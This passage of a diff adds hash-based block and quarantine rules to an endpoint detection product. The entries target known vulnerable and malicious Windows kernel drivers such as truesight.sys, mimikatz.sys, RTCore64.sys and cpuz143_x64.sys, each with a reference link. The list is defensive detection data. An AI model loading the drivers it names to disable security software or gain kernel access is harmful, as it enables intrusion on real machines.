+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0cace0bf30720a79c34ad1c253313a35e15ab9f7257d0fea6b9a6b8d61f7b23",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39dd0f2e-cb03-5457-8d53-e614cd5b7acb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145782Z",
+ "creation_date": "2026-03-23T11:45:31.145784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "542d3172a05ce27d264e46e05da66101781c5e8cf802196c89effc7d9c0509be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39de56a7-0cb8-5671-a1f7-dbc017c030d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821442Z",
+ "creation_date": 
"2026-03-23T11:45:30.821445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31ffc8218a52c3276bece1e5bac7fcb638dca0bc95c2d385511958abdbe4e4a5",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39f6f5dd-9ea9-57ed-8462-875caf1faf74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834379Z",
+ "creation_date": "2026-03-23T11:45:30.834383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f66b8cb2bde015e2a031fa395bcb0d6920f7b55e229a5c88e0ec5772708a9dbe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "39f7c046-3d67-504c-96af-05c5d4750b48",
+ 
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151178Z",
+ "creation_date": "2026-03-23T11:45:31.151180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c14d101cf793d7de96dc1d2551bf5e4747e7a80b2c1878116321024be257bb0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a09c3f2-96d6-5535-ab43-5f98f2c74e67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467849Z",
+ "creation_date": "2026-03-23T11:45:30.467852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": 
"2026-03-23T11:45:30.467863Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0895a8fa3ee38bb38cb9fcd0183cf9466c7577eab746b3540bd0b2f282246dc6",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a0b47ed-623a-5a9a-8cd6-e148521a72d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488466Z",
+ "creation_date": "2026-03-23T11:45:31.488468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99d89d9b0352e810b9084e8a4273c5a5e1609c72029e9115e9bc1407bbea9f35",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a0fa602-fb5e-5a76-a3c0-f8fe830e7417",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": 
"critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973322Z",
+ "creation_date": "2026-03-23T11:45:29.973324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d884ca8cc4ef1826ca3ab03eb3c2d8f356ba25f2d20db0a7d9fc251c565be7f3",
+ "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a238d8c-3820-5fa6-8114-211d31f65d87",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830890Z",
+ "creation_date": "2026-03-23T11:45:30.830892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": 
"hash",
+ "value": "afe2ddf92a2c0f32c58ab6fdd40bf1120d161e036ac54a3cb29e5f8cb98d4c37",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a2a6a4c-262e-58e9-bf5e-32c498eda778",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142072Z",
+ "creation_date": "2026-03-23T11:45:31.142074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142080Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38e4469b142f388b6fbe9ce712ee00d590087d470ca5be8bb19df321ce5b4bbf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a2d86d2-d71c-502a-8a32-26df74ac78a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ 
"rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616783Z",
+ "creation_date": "2026-03-23T11:45:29.616785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d052299252f0f0bd70b5e7c46b9ca71a99a052b47f693582becb6f0d567e8245",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a37ec5b-f4ee-5e25-8c8a-14b5a498cba9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468719Z",
+ "creation_date": "2026-03-23T11:45:30.468722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468730Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c87d5f1261a367493fd2f240ace027bef5b178cff3dea22d45e8fa2b0f0541e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a38406a-f562-5371-91b7-7052ae1b7f15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610512Z",
+ "creation_date": "2026-03-23T11:45:29.610514Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67734c7c0130dd66c964f76965f09a2290da4b14c94412c0056046e700654bdc",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a3d5498-891b-5876-bc24-6e640dbb2556",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482507Z",
+ "creation_date": "2026-03-23T11:45:31.482511Z",
+ 
"enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482520Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "167076cfb884ad82996eac9cf9dd02aec1e149ddfff11b5c4e8fc378f4898944",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a408110-c1d3-50c6-bc13-0416ed7a34b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829978Z",
+ "creation_date": "2026-03-23T11:45:30.829980Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3468c3bdd003bc14864251addf657ddc5111e8c2fbfd14678cc98fec06f112f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": 
"3a4339fd-e588-5ec0-a0d6-01a5a746d1ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462670Z",
+ "creation_date": "2026-03-23T11:45:30.462674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8c71e1844e987cd6f9c2baf28d9520d4ccdd8593ce7051bb1b3c9bf1d97076a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a4783a3-0442-5285-9d29-47352d6c28d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822746Z",
+ "creation_date": "2026-03-23T11:45:30.822748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822753Z",
+ 
"rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11e76c3f091b3771d881e82f7171e72228bd43877aeea9008d7de4bda184aec2",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a496165-fea9-5a6c-a60e-2a31daa12650",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983473Z",
+ "creation_date": "2026-03-23T11:45:29.983475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04a269dd0a03e32e5b2a1c8ab0768791962e040d080d44dc44dab01dd7954f2b",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a51b5e9-d549-5b8e-a04c-d94dc20a213e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457336Z",
+ "creation_date": "2026-03-23T11:45:30.457340Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "888491196bd8ff528b773a3e453eae49063ad31fb4ca0f9f2e433f8d35445440",
+ "comment": "Malicious Kernel Driver (aka 4748696211bd56c2d93c21cab91e82a5.sys) [https://www.loldrivers.io/drivers/2d6c1da6-17e2-4385-ad93-1430f83bde83/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a6293fa-8db4-5c7d-a184-0bb3905bc3f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607470Z",
+ "creation_date": "2026-03-23T11:45:29.607472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cf6c6c2d231eaf67dfc87561cc9a56ecef89ab50baafee5a67962748d51faf3",
+ "comment": "Micro-Star MSI Afterburner vulnerable 
driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a68153b-1bd7-52b4-a5ce-050c2b7db2db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462171Z",
+ "creation_date": "2026-03-23T11:45:30.462174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7a6c3a40724ba871e13d9c55b7967ed252777a2382fea86e4ed6a2a8203fb4a",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3a6c7d63-0f96-53a2-9170-10068c0f4992",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480015Z",
+ "creation_date": 
"2026-03-23T11:45:31.480019Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480029Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24790097b421265d0cd487a141d6ca7a1e6dd1064d6e333b50335649115580b7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3a6e9ebc-b0ed-558f-a81f-33087ea978ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611150Z", + "creation_date": "2026-03-23T11:45:29.611152Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611157Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0aa61910c3ceb765441c35925a50983b2571ac22da510f1495cf82f078b535b6", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 